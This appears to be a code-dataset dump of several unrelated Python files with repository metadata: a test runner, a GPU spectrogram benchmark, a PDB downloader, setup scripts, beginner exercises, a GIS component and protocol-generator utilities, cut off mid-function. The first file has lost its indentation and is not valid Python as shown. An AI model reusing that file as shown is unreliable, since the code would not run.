bc8efe8d75934b61443e05664bf142fdc9790c04 | 6,351 | py | Python | run_tests.py | silx-kit/silx | 360f890a617676a92f0bed6a28b718d09e70ec03 | ["CC0-1.0", "MIT"] | 94 | 2016-03-04T17:25:53.000Z | 2022-03-18T18:05:23.000Z | run_tests.py | silx-kit/silx | 360f890a617676a92f0bed6a28b718d09e70ec03 | ["CC0-1.0", "MIT"] | 2,841 | 2016-01-21T09:06:49.000Z | 2022-03-18T14:53:56.000Z | run_tests.py | silx-kit/silx | 360f890a617676a92f0bed6a28b718d09e70ec03 | ["CC0-1.0", "MIT"] | 71 | 2015-09-30T08:35:35.000Z | 2022-03-16T07:16:28.000Z |
#!/usr/bin/env python3
# coding: utf8
# /*##########################################################################
#
# Copyright (c) 2015-2021 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# ###########################################################################*/
"""Run the tests of the project.
This script expects a suite function in <project_package>.test,
which returns a unittest.TestSuite.
Test coverage dependencies: coverage, lxml.
"""
__authors__ = ["Jérôme Kieffer", "Thomas Vincent"]
__date__ = "30/09/2020"
__license__ = "MIT"
import distutils.util
import logging
import os
import subprocess
import sys
import importlib
# Capture all default warnings
logging.captureWarnings(True)
import warnings
warnings.simplefilter('default')
logger = logging.getLogger("run_tests")
logger.setLevel(logging.WARNING)
logger.info("Python %s %s", sys.version, tuple.__itemsize__ * 8)
try:
import numpy
except Exception as error:
logger.warning("Numpy missing: %s", error)
else:
logger.info("Numpy %s", numpy.version.version)
try:
import h5py
except Exception as error:
logger.warning("h5py missing: %s", error)
else:
logger.info("h5py %s", h5py.version.version)
def get_project_name(root_dir):
"""Retrieve project name by running python setup.py --name in root_dir.
:param str root_dir: Directory where to run the command.
:return: The name of the project stored in root_dir
"""
logger.debug("Getting project name in %s", root_dir)
p = subprocess.Popen([sys.executable, "setup.py", "--name"],
shell=False, cwd=root_dir, stdout=subprocess.PIPE)
name, _stderr_data = p.communicate()
logger.debug("subprocess ended with rc= %s", p.returncode)
return name.split()[-1].decode('ascii')
def is_debug_python():
"""Returns true if the Python interpreter is in debug mode."""
try:
import sysconfig
except ImportError: # pragma nocover
# Python < 2.7
import distutils.sysconfig as sysconfig
if sysconfig.get_config_var("Py_DEBUG"):
return True
return hasattr(sys, "gettotalrefcount")
def build_project(name, root_dir):
"""Run python setup.py build for the project.
Build directory can be modified by environment variables.
:param str name: Name of the project.
:param str root_dir: Root directory of the project
:return: The path to the directory were build was performed
"""
platform = distutils.util.get_platform()
architecture = "lib.%s-%i.%i" % (platform,
sys.version_info[0], sys.version_info[1])
if is_debug_python():
architecture += "-pydebug"
if os.environ.get("PYBUILD_NAME") == name:
# we are in the debian packaging way
home = os.environ.get("PYTHONPATH", "").split(os.pathsep)[-1]
elif os.environ.get("BUILDPYTHONPATH"):
home = os.path.abspath(os.environ.get("BUILDPYTHONPATH", ""))
else:
home = os.path.join(root_dir, "build", architecture)
logger.warning("Building %s to %s", name, home)
p = subprocess.Popen([sys.executable, "setup.py", "build"],
shell=False, cwd=root_dir)
logger.debug("subprocess ended with rc= %s", p.wait())
if os.path.isdir(home):
return home
alt_home = os.path.join(os.path.dirname(home), "lib")
if os.path.isdir(alt_home):
return alt_home
def import_project_module(project_name, project_dir):
"""Import project module, from the system of from the project directory"""
if "--installed" in sys.argv:
try:
module = importlib.import_module(project_name)
except Exception:
logger.error("Cannot run tests on installed version: %s not installed or raising error.",
project_name)
raise
else: # Use built source
build_dir = build_project(project_name, project_dir)
if build_dir is None:
logging.error("Built project is not available !!! investigate")
sys.path.insert(0, build_dir)
logger.warning("Patched sys.path, added: '%s'", build_dir)
module = importlib.import_module(project_name)
return module
if __name__ == "__main__": # Needed for multiprocessing support on Windows
import pytest
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
PROJECT_NAME = get_project_name(PROJECT_DIR)
logger.info("Project name: %s", PROJECT_NAME)
project_module = import_project_module(PROJECT_NAME, PROJECT_DIR)
PROJECT_VERSION = getattr(project_module, 'version', '')
PROJECT_PATH = project_module.__path__[0]
def normalize_option(option):
option_parts = option.split(os.path.sep)
if option_parts == ["src", "silx"]:
return PROJECT_PATH
if option_parts[:2] == ["src", "silx"]:
return os.path.join(PROJECT_PATH, *option_parts[2:])
return option
args = [normalize_option(p) for p in sys.argv[1:] if p != "--installed"]
# Run test on PROJECT_PATH if nothing is specified
without_options = [a for a in args if not a.startswith("-")]
if len(without_options) == 0:
args += [PROJECT_PATH]
argv = ["--rootdir", PROJECT_PATH] + args
sys.exit(pytest.main(argv))
| 34.895604 | 101 | 0.668714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,976 | 0.46844 |
bc92d9002e07294919b14cfdd4a1703514d8c845 | 53 | py | Python | server/api/src/db/migrate/versions/v_2.py | mminamina/311-data | 9a3e4dc6e14c7500fc3f75f583c7fc4b01108b29 | ["MIT"] | null | null | null | server/api/src/db/migrate/versions/v_2.py | mminamina/311-data | 9a3e4dc6e14c7500fc3f75f583c7fc4b01108b29 | ["MIT"] | null | null | null | server/api/src/db/migrate/versions/v_2.py | mminamina/311-data | 9a3e4dc6e14c7500fc3f75f583c7fc4b01108b29 | ["MIT"] | null | null | null |
def migrate():
print('migrating to version 2')
| 10.6 | 35 | 0.641509 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 24 | 0.45283 |
bc93ed322f15833ada38ade26d0df82b04900ca0 | 1,908 | py | Python | bench_cupy.py | zhouxzh/Jetson_nano_stft_benchmark | ffa97984f95b9862ac2a10b8459bb7ef241c6c72 | ["MIT"] | null | null | null | bench_cupy.py | zhouxzh/Jetson_nano_stft_benchmark | ffa97984f95b9862ac2a10b8459bb7ef241c6c72 | ["MIT"] | null | null | null | bench_cupy.py | zhouxzh/Jetson_nano_stft_benchmark | ffa97984f95b9862ac2a10b8459bb7ef241c6c72 | ["MIT"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Computes the spectrogram of a test signal using cupy and cuFFT.
Author: Jan Schlüter
"""
import sys
import os
import timeit
import numpy as np
import cupy as cp
INPUT_ON_GPU = True
OUTPUT_ON_GPU = True
from testfile import make_test_signal
def spectrogram(signal, sample_rate=22050, frame_len=1024, fps=70):
"""
Computes a magnitude spectrogram at a given sample rate (in Hz), frame
length (in samples) and frame rate (in Hz), on CUDA using cupy.
"""
if not INPUT_ON_GPU:
signal = cp.array(signal.astype(np.float32)) # already blown up to a list of frames
win = cp.hanning(frame_len).astype(cp.float32)
# apply window function
#signal *= win # this doesn't work correctly for some reason.
signal = signal * win
# perform FFT
spect = cp.fft.rfft(signal)
# convert into magnitude spectrogram
spect = cp.abs(spect)
# return
if OUTPUT_ON_GPU:
cp.cuda.get_current_stream().synchronize()
else:
return spect.get()
def main():
# load input
global x, spectrogram
x = make_test_signal()
# we do the following here because cupy cannot do stride tricks
# the actual copying work is included in the benchmark unless INPUT_ON_GPU
hop_size = 22050 // 70
frame_len = 1024
frames = len(x) - frame_len + 1
x = np.lib.stride_tricks.as_strided(
x, (frames, frame_len), (x.strides[0], x.strides[0]))[::hop_size]
if INPUT_ON_GPU:
x = cp.array(x.astype(np.float32))
# benchmark
times = timeit.repeat(
setup='from __main__ import x, spectrogram',
stmt='spectrogram(x)',
repeat=5, number=32)
print("Took %.3fs." % (min(times) / 32))
# save result
#assert not OUTPUT_ON_GPU
#np.save(sys.argv[0][:-2] + 'npy', spectrogram(x))
if __name__=="__main__":
    main()
| 26.5 | 92 | 0.649371 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 796 | 0.416972 |
bc986ff7e618db67d5b1902a0fdfeecd1595ea88 | 1,482 | py | Python | pythonTools/downloadPDBsInList.py | rsanchezgarc/BIPSPI | e155fee0836084ea02bc9919c58817d26a4a13e5 | ["Apache-2.0"] | 5 | 2020-01-21T21:11:49.000Z | 2022-02-06T19:55:28.000Z | pythonTools/downloadPDBsInList.py | rsanchezgarc/BIPSPI | e155fee0836084ea02bc9919c58817d26a4a13e5 | ["Apache-2.0"] | null | null | null | pythonTools/downloadPDBsInList.py | rsanchezgarc/BIPSPI | e155fee0836084ea02bc9919c58817d26a4a13e5 | ["Apache-2.0"] | 3 | 2018-05-25T14:57:36.000Z | 2022-01-27T12:53:41.000Z |
import sys, os
from subprocess import call
try:
from downloadPdb import downloadPDB
except ImportError:
from .downloadPdb import downloadPDB
pdbListFile="/home/rsanchez/Tesis/rriPredMethod/data/joanDimers/117_dimers_list.tsv"
outPath="/home/rsanchez/Tesis/rriPredMethod/data/joanDimers/pdbFiles/rawPDBs"
USE_BIO_UNIT=False
##def downloadPDB(pdbId, pdbOutPath, useBioUnit):
#### descargar pdb: wget ftp://ftp.wwpdb.org/pub/pdb/data/biounit/coordinates/all/1i1q.pdb2.gz o ya descomprimido
#### wget -qO- ftp://ftp.wwpdb.org/pub/pdb/data/biounit/coordinates/all/1i1q.pdb2.gz |zcat > 1i1q.pdb
## outName= os.path.join(pdbOutPath,pdbId+'.pdb')
## if not os.path.isfile(outName):
## if useBioUnit:
## cmd= 'wget -qO- ftp://ftp.wwpdb.org/pub/pdb/data/biounit/coordinates/all/%s.pdb1.gz |zcat > %s'%(pdbId.lower(), outName)
## else:
## cmd= 'wget -qO- http://www.pdb.org/pdb/files/%s.pdb | cat > %s'%(pdbId.upper(), outName)
## print(cmd)
## call(cmd, shell= True)
def downloadInFile(fname, outPath, useBioUnit):
with open(fname) as f:
for line in f:
pdbId= line.split()[0]
print(pdbId)
downloadPDB(pdbId, outPath, bioUnit= 0 if useBioUnit else None)
if __name__=="__main__":
if len(sys.argv)==3:
pdbListFile= os.path.abspath(os.path.expanduser(sys.argv[1]))
outPath= os.path.abspath(os.path.expanduser(sys.argv[2]))
print( pdbListFile, outPath)
downloadInFile(pdbListFile, outPath, USE_BIO_UNIT)
| 36.146341 | 129 | 0.702429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 802 | 0.541161 |
bc9c8f24e080e4c64950de33e4962b6b2e44ede2 | 1,575 | py | Python | setup.py | maciek3000/data_dashboard | 1b573b674d37f57ae7e8bbfb1e83c801b488dfd6 | ["MIT"] | 8 | 2021-05-03T04:06:15.000Z | 2022-01-15T16:27:42.000Z | setup.py | maciek3000/data_dashboard | 1b573b674d37f57ae7e8bbfb1e83c801b488dfd6 | ["MIT"] | null | null | null | setup.py | maciek3000/data_dashboard | 1b573b674d37f57ae7e8bbfb1e83c801b488dfd6 | ["MIT"] | 3 | 2021-05-19T17:31:18.000Z | 2021-06-19T12:24:01.000Z |
from setuptools import setup, find_packages
import pathlib
here = pathlib.Path(__file__).parent.resolve()
long_description = (here / "readme.md").read_text(encoding="utf-8")
setup(
name="data_dashboard",
version="0.1.1",
description="Dashboard to explore the data and to create baseline Machine Learning model.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/maciek3000/data_dashboard",
author="Maciej Dowgird",
author_email="dowgird.maciej@gmail.com",
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Scientific/Engineering :: Visualization"
],
package_dir={"data_dashboard": "data_dashboard"},
packages=find_packages(),
python_requires=">=3.7",
install_requires=[
"pandas>=1.2.3",
"numpy>=1.19.5",
"scipy>=1.6.1",
"beautifulsoup4>=4.9.3",
"scikit-learn>=0.24.1",
"seaborn>=0.11.1",
"bokeh>=2.3.0",
"Jinja2>=2.11.3",
"xgboost>=1.3.3",
"lightgbm>=3.2.0"
],
package_data={
"data_dashboard": ["static/*", "templates/*", "examples/*"]
},
project_urls={
"Github": "https://github.com/maciek3000/data_dashboard",
},
)
| 32.142857 | 95 | 0.615238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 859 | 0.545397 |
bca568d5e71e781c0b945807208117a83879f72f | 263 | py | Python | doc's/3-labels_and_titles.py | andreluispy/py2html | 227f3225632b467c95131b841d6ffab4c5202e44 | ["MIT"] | null | null | null | doc's/3-labels_and_titles.py | andreluispy/py2html | 227f3225632b467c95131b841d6ffab4c5202e44 | ["MIT"] | null | null | null | doc's/3-labels_and_titles.py | andreluispy/py2html | 227f3225632b467c95131b841d6ffab4c5202e44 | ["MIT"] | null | null | null |
from py2html.main import *
page = web()
page.create()
# Header Parameters
# text = header text
# n = title level
page.header(text='My Site', n=1)
# Label Parameters
# text = label text
# color = label color
page.label(text='Hello World', color='blue')
page.compile()
| 16.4375 | 32 | 0.657795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 135 | 0.513308 |
bcb3b617387a63312fcb662d0698c65cf437acee | 3,340 | py | Python | LearnFunction/learnfunction01.py | subash-kc/2022-01-04-Python | 5ce51e4265bcd860a4e62423edef6ec9cd1437b4 | ["MIT"] | 1 | 2022-01-14T18:03:42.000Z | 2022-01-14T18:03:42.000Z | LearnFunction/learnfunction01.py | subash-kc/2022-01-04-Python | 5ce51e4265bcd860a4e62423edef6ec9cd1437b4 | ["MIT"] | null | null | null | LearnFunction/learnfunction01.py | subash-kc/2022-01-04-Python | 5ce51e4265bcd860a4e62423edef6ec9cd1437b4 | ["MIT"] | null | null | null |
"""
Functions are subprograms which are used to compute a value or perform a task.
Types of Functions:-
Built-in Functions:
print(), upper()
User-defined functions
Advantages of Functions
1. Write once and use it as many times as you need. This provides code reusability
2. Functions facilitate ease of code maintenance
3. Dividing a large task into many small tasks helps you debug code
4. You can remove or add new features to a function anytime.
"""
"""
We can define a function using the def keyword followed by the function name with parentheses. This is
also called Creating a Function, Writing a Function, or Defining a Function.
Syntax:-
def function_name():
    Local Variable
    block of statements
    return (variable or expression)
def function_name(param1, param2, param3, .....):
    Local Variable
    block of statements
    return (variable or expression)
Note - Need to maintain proper indentation
"""
# creating a list
def add():
list = [8, 2, 3, 0, 7]
total = 0;
for i in range(0, len(list)):
total = total + list[i]
print('Sum of all elements in given list: ', total)
if __name__ == '__main__':
add()
print()
# another method
def sum_list():
mylist = [8, 2, 3, 0, 7]
# Using inbuilt sum method
total = sum(mylist)
print("Sum of all elements in given list1: ", total)
if __name__ == '__main__':
sum_list()
print()
def multiplylist():
list_multiply = [8, 2, 3, -1, 7]
total = 1;
for x in list_multiply:
total = total * x
print(total)
if __name__ == '__main__':
multiplylist()
# Method 2: Using numpy.prod() - requires the numpy package to be installed
import numpy
def product_total():
list_product = [8, 2, 3, -1, 7]
total = numpy.prod(list_product)
print("Another method using numpy method to find product in list: ", total)
product_total()
print()
def findingminmax(num1: int, num2: int, num3: int) -> int:
max = 0;
    if (num1 > num2 and num1 > num3):
max = num1
elif (num2 > num1 and num2 > num3):
max = num2
else:
max = num3
print("The maximum number in given list is: ", max)
findingminmax(22, 26, 30)
print()
print("Another Method to find maximum")
def findingmaximum(num1: int, num2: int, num3: int) -> int:
find_max_list = (num1, num2, num3)
return max(find_max_list)
x = int(input("Enter your first Number: "))
y = int(input("Enter your second Number: "))
z = int(input("Enter your third Number: "))
print("Maximum number is ::>", findingmaximum(x, y, z))
"""Python program to print the even numbers from a given list"""
def find_even():
sample_list = [1, 2, 3, 4, 5, 6, 7, 8, 9]
for num in sample_list:
if num % 2 == 0:
print(num, end=" ")
find_even()
print()
"""
Python program to check whether a given number is prime
Function should return True if the number is prime; else False
"""
def isPrime(num):
    if (num < 2):
        return False
for i in range (2, num//2+1):
if(num%i==0):
return False
return True
number =int(input("Enter the number you will like to check whether the number is prime or not: \n"))
if isPrime(number):
print(number, "is a Prime Number")
else:
print(number, "is not a Prime number")
"""
Another Method to find prime number
"""
| 18.870056 | 106 | 0.645808 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,743 | 0.521856 |
bcb4c4328d404e8eec9df91c64d171e98d7a2415 | 5,778 | py | Python | src/Gismo_XY To Location.py | AntonelloDN/gismo | 3ffbabaf8405efd3572701c9e0b7497211dfc248 | ["Apache-2.0"] | 57 | 2017-01-31T11:55:22.000Z | 2022-03-26T16:00:40.000Z | src/Gismo_XY To Location.py | AntonelloDN/gismo | 3ffbabaf8405efd3572701c9e0b7497211dfc248 | ["Apache-2.0"] | 11 | 2017-02-22T16:45:11.000Z | 2020-05-06T17:00:07.000Z | src/Gismo_XY To Location.py | AntonelloDN/gismo | 3ffbabaf8405efd3572701c9e0b7497211dfc248 | ["Apache-2.0"] | 19 | 2017-01-29T18:02:58.000Z | 2021-08-25T10:56:57.000Z |
# xy to location
#
# Gismo is a plugin for GIS environmental analysis (GPL) started by Djordje Spasic.
#
# This file is part of Gismo.
#
# Copyright (c) 2019, Djordje Spasic <djordjedspasic@gmail.com>
# Gismo is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
#
# Gismo is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/.
#
# The GPL-3.0+ license <http://spdx.org/licenses/GPL-3.0+>
"""
Use this component to calculate latitude and longitude coordinates of the _point in Rhino scene.
For example: you created some building shapes with Gismo "OSM Shapes" component, and now you would like to check what are the latitude and longtitude coordinates of particular part of the building.
-
Provided by Gismo 0.0.3
input:
_point: A point for which we would like to calculate its latitude and longitude coordinates
anchorLocation_: Represents latitude,longitude coordinates which correspond to anchorOrigin_ in Rhino scene.
-
If nothing added to this input, anchorLocation_ with both latitude and longitude set to "0" will be used as a default.
anchorOrigin_: A point in Rhino scene which corresponds to anchorLocation_.
-
If nothing added to this input, anchorOrigin will be set to: 0,0,0.
output:
readMe!: ...
location: Location (latitude, longitude coordinates) of the _point input.
"""
ghenv.Component.Name = "Gismo_XY To Location"
ghenv.Component.NickName = "XYtoLocation"
ghenv.Component.Message = "VER 0.0.3\nJAN_29_2019"
ghenv.Component.IconDisplayMode = ghenv.Component.IconDisplayMode.application
ghenv.Component.Category = "Gismo"
ghenv.Component.SubCategory = "1 | Gismo"
#compatibleGismoVersion = VER 0.0.3\nJAN_29_2019
try: ghenv.Component.AdditionalHelpFromDocStrings = "2"
except: pass
import scriptcontext as sc
import Grasshopper
import Rhino
def main(requiredPoint, anchorLocation, anchorOrigin):
# check inputs
if (requiredPoint == None):
required_location = None
validInputData = False
printMsg = "Please add a point to this component's \"_point\" input."
return required_location, validInputData, printMsg
if (anchorLocation == None):
locationName = "unknown location"
anchor_locationLatitudeD = 0
anchor_locationLongitudeD = 0
timeZone = 0
elevation = 0
else:
locationName, anchor_locationLatitudeD, anchor_locationLongitudeD, timeZone, elevation, validLocationData, printMsg = gismo_preparation.checkLocationData(anchorLocation)
if (anchorOrigin == None):
anchorOrigin = Rhino.Geometry.Point3d(0,0,0)
unitConversionFactor, unitSystemLabel = gismo_preparation.checkUnits()
anchorOrigin_meters = Rhino.Geometry.Point3d(anchorOrigin.X*unitConversionFactor, anchorOrigin.Y*unitConversionFactor, anchorOrigin.Z*unitConversionFactor)
requiredPoint_meters = Rhino.Geometry.Point3d(requiredPoint.X*unitConversionFactor, requiredPoint.Y*unitConversionFactor, requiredPoint.Z*unitConversionFactor)
# inputCRS
EPSGcode = 4326 # WGS 84
inputCRS_dummy = gismo_gis.CRS_from_EPSGcode(EPSGcode)
# outputCRS
outputCRS_dummy = gismo_gis.UTM_CRS_from_latitude(anchor_locationLatitudeD, anchor_locationLongitudeD)
anchor_originProjected_meters = gismo_gis.convertBetweenTwoCRS(inputCRS_dummy, outputCRS_dummy, anchor_locationLongitudeD, anchor_locationLatitudeD) # in meters
# inputCRS
# based on assumption that both anchorLocation_ input and required_location belong to the same UTM zone
inputCRS = gismo_gis.UTM_CRS_from_latitude(anchor_locationLatitudeD, anchor_locationLongitudeD, anchor_locationLatitudeD, anchor_locationLongitudeD)
# outputCRS
EPSGcode = 4326
outputCRS = gismo_gis.CRS_from_EPSGcode(EPSGcode)
latitudeLongitudePt = gismo_gis.convertBetweenTwoCRS(inputCRS, outputCRS, (anchor_originProjected_meters.X - anchorOrigin_meters.X) + requiredPoint_meters.X, (anchor_originProjected_meters.Y - anchorOrigin_meters.Y) + requiredPoint_meters.Y)
required_location = gismo_preparation.constructLocation(locationName, latitudeLongitudePt.Y, latitudeLongitudePt.X, timeZone, elevation)
validInputData = True
printMsg = "ok"
return required_location, validInputData, printMsg
level = Grasshopper.Kernel.GH_RuntimeMessageLevel.Warning
if sc.sticky.has_key("gismoGismo_released"):
validVersionDate, printMsg = sc.sticky["gismo_check"].versionDate(ghenv.Component)
if validVersionDate:
gismo_preparation = sc.sticky["gismo_Preparation"]()
gismo_gis = sc.sticky["gismo_GIS"]()
location, validInputData, printMsg = main(_point, anchorLocation_, anchorOrigin_)
if not validInputData:
print printMsg
ghenv.Component.AddRuntimeMessage(level, printMsg)
else:
print printMsg
ghenv.Component.AddRuntimeMessage(level, printMsg)
else:
printMsg = "First please run the Gismo Gismo component."
print printMsg
ghenv.Component.AddRuntimeMessage(level, printMsg)
| 47.360656 | 246 | 0.72776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,433 | 0.42108 |
bcb5f8a3494a7c1dd73bdaa2595e97b680531db5 | 256 | py | Python | Notebooks/SentinelUtilities/SentinelAnomalyLookup/__init__.py | ytognder/Azure-Sentinel | 7345560f178e731d7ba5a5541fd3383bca285311 | ["MIT"] | 266 | 2019-10-18T00:41:39.000Z | 2022-03-18T05:44:01.000Z | Notebooks/SentinelUtilities/SentinelAnomalyLookup/__init__.py | ytognder/Azure-Sentinel | 7345560f178e731d7ba5a5541fd3383bca285311 | ["MIT"] | 113 | 2020-03-10T16:56:10.000Z | 2022-03-28T21:54:26.000Z | Notebooks/SentinelUtilities/SentinelAnomalyLookup/__init__.py | ytognder/Azure-Sentinel | 7345560f178e731d7ba5a5541fd3383bca285311 | ["MIT"] | 93 | 2020-01-07T20:28:43.000Z | 2022-03-23T04:09:39.000Z |
# pylint: disable-msg=C0103
"""
SentinelAnomalyLookup: This package is developed for Azure Sentinel Anomaly lookup
"""
# __init__.py
from .anomaly_lookup_view_helper import AnomalyLookupViewHelper
from .anomaly_finder import AnomalyQueries, AnomalyFinder
| 28.444444 | 82 | 0.832031 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 130 | 0.507813 |
bccd1fa8fe336f245d1474aeb673c6c021c08a1b | 20,598 | py | Python | aea/protocols/generator/common.py | valory-xyz/agents-aea | 8f38efa96041b0156ed1ae328178e395dbabf2fc | ["Apache-2.0"] | null | null | null | aea/protocols/generator/common.py | valory-xyz/agents-aea | 8f38efa96041b0156ed1ae328178e395dbabf2fc | ["Apache-2.0"] | null | null | null | aea/protocols/generator/common.py | valory-xyz/agents-aea | 8f38efa96041b0156ed1ae328178e395dbabf2fc | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 Valory AG
# Copyright 2018-2021 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains utility code for generator modules."""
import inspect
import os
import re
import shutil
import subprocess # nosec
import sys
import tempfile
from pathlib import Path
from typing import Tuple
from aea.configurations.base import ProtocolSpecification
from aea.configurations.constants import (
DEFAULT_PROTOCOL_CONFIG_FILE,
PACKAGES,
PROTOCOL_LANGUAGE_JS,
PROTOCOL_LANGUAGE_PYTHON,
)
from aea.configurations.loader import ConfigLoader
from aea.helpers.io import open_file
SPECIFICATION_PRIMITIVE_TYPES = ["pt:bytes", "pt:int", "pt:float", "pt:bool", "pt:str"]
SPECIFICATION_COMPOSITIONAL_TYPES = [
"pt:set",
"pt:list",
"pt:dict",
"pt:union",
"pt:optional",
]
PYTHON_COMPOSITIONAL_TYPES = [
"FrozenSet",
"Tuple",
"Dict",
"Union",
"Optional",
]
MESSAGE_IMPORT = "from aea.protocols.base import Message"
SERIALIZER_IMPORT = "from aea.protocols.base import Serializer"
PATH_TO_PACKAGES = PACKAGES
INIT_FILE_NAME = "__init__.py"
PROTOCOL_YAML_FILE_NAME = DEFAULT_PROTOCOL_CONFIG_FILE
MESSAGE_DOT_PY_FILE_NAME = "message.py"
DIALOGUE_DOT_PY_FILE_NAME = "dialogues.py"
CUSTOM_TYPES_DOT_PY_FILE_NAME = "custom_types.py"
SERIALIZATION_DOT_PY_FILE_NAME = "serialization.py"
PYTHON_TYPE_TO_PROTO_TYPE = {
"bytes": "bytes",
"int": "int32",
"float": "float",
"bool": "bool",
"str": "string",
}
CURRENT_DIR = os.path.dirname(inspect.getfile(inspect.currentframe())) # type: ignore
ISORT_CONFIGURATION_FILE = os.path.join(CURRENT_DIR, "isort.cfg")
ISORT_CLI_ARGS = [
"--settings-path",
ISORT_CONFIGURATION_FILE,
"--quiet",
]
PROTOLINT_CONFIGURATION_FILE_NAME = "protolint.yaml"
PROTOLINT_CONFIGURATION = """lint:
rules:
remove:
- MESSAGE_NAMES_UPPER_CAMEL_CASE
- ENUM_FIELD_NAMES_ZERO_VALUE_END_WITH
- PACKAGE_NAME_LOWER_CASE
- REPEATED_FIELD_NAMES_PLURALIZED
- FIELD_NAMES_LOWER_SNAKE_CASE"""
PROTOLINT_INDENTATION_ERROR_STR = "incorrect indentation style"
PROTOLINT_ERROR_WHITELIST = [PROTOLINT_INDENTATION_ERROR_STR]
def _to_camel_case(text: str) -> str:
"""
Convert a text in snake_case format into the CamelCase format.
:param text: the text to be converted.
:return: The text in CamelCase format.
"""
return "".join(word.title() for word in text.split("_"))
def _camel_case_to_snake_case(text: str) -> str:
"""
Convert a text in CamelCase format into the snake_case format.
:param text: the text to be converted.
:return: The text in CamelCase format.
"""
return re.sub(r"(?<!^)(?=[A-Z])", "_", text).lower()
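# e.g. _to_camel_case("custom_type") -> "CustomType" and
#      _camel_case_to_snake_case("CustomType") -> "custom_type"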
def _match_brackets(text: str, index_of_open_bracket: int) -> int:
"""
Give the index of the matching close bracket for the opening bracket at 'index_of_open_bracket' in the input 'text'.
:param text: the text containing the brackets.
:param index_of_open_bracket: the index of the opening bracket.
:return: the index of the matching closing bracket (if any).
:raises SyntaxError if there are no matching closing bracket.
"""
if text[index_of_open_bracket] != "[":
raise SyntaxError(
"Index {} in 'text' is not an open bracket '['. It is {}".format(
index_of_open_bracket,
text[index_of_open_bracket],
)
)
open_bracket_stack = []
for index in range(index_of_open_bracket, len(text)):
if text[index] == "[":
open_bracket_stack.append(text[index])
elif text[index] == "]":
open_bracket_stack.pop()
if not open_bracket_stack:
return index
    raise SyntaxError(
        "No matching closing bracket ']' for the opening bracket '[' at {}".format(
            index_of_open_bracket
        )
    )
def _has_matched_brackets(text: str) -> bool:
"""
Evaluate whether every opening bracket '[' in the 'text' has a matching closing bracket ']'.
:param text: the text.
:return: Boolean result, and associated message.
"""
open_bracket_stack = []
for index, _ in enumerate(text):
if text[index] == "[":
open_bracket_stack.append(index)
elif text[index] == "]":
if len(open_bracket_stack) == 0:
return False
open_bracket_stack.pop()
return len(open_bracket_stack) == 0
def _get_sub_types_of_compositional_types(compositional_type: str) -> Tuple[str, ...]:
"""
Extract the sub-types of compositional types.
This method handles both specification types (e.g. pt:set[], pt:dict[]) as well as python types (e.g. FrozenSet[], Union[]).
:param compositional_type: the compositional type string whose sub-types are to be extracted.
:return: tuple containing all extracted sub-types.
"""
sub_types_list = list()
for valid_compositional_type in (
SPECIFICATION_COMPOSITIONAL_TYPES + PYTHON_COMPOSITIONAL_TYPES
):
if compositional_type.startswith(valid_compositional_type):
inside_string = compositional_type[
compositional_type.index("[") + 1 : compositional_type.rindex("]")
].strip()
while inside_string != "":
do_not_add = False
if inside_string.find(",") == -1: # No comma; this is the last sub-type
provisional_sub_type = inside_string.strip()
if (
provisional_sub_type == "..."
): # The sub-string is ... used for Tuple, e.g. Tuple[int, ...]
do_not_add = True
else:
sub_type = provisional_sub_type
inside_string = ""
else: # There is a comma; this MAY not be the last sub-type
sub_string_until_comma = inside_string[
: inside_string.index(",")
].strip()
if (
sub_string_until_comma.find("[") == -1
): # No open brackets; this is a primitive type and NOT the last sub-type
sub_type = sub_string_until_comma
inside_string = inside_string[
inside_string.index(",") + 1 :
].strip()
else: # There is an open bracket'['; this is a compositional type
try:
closing_bracket_index = _match_brackets(
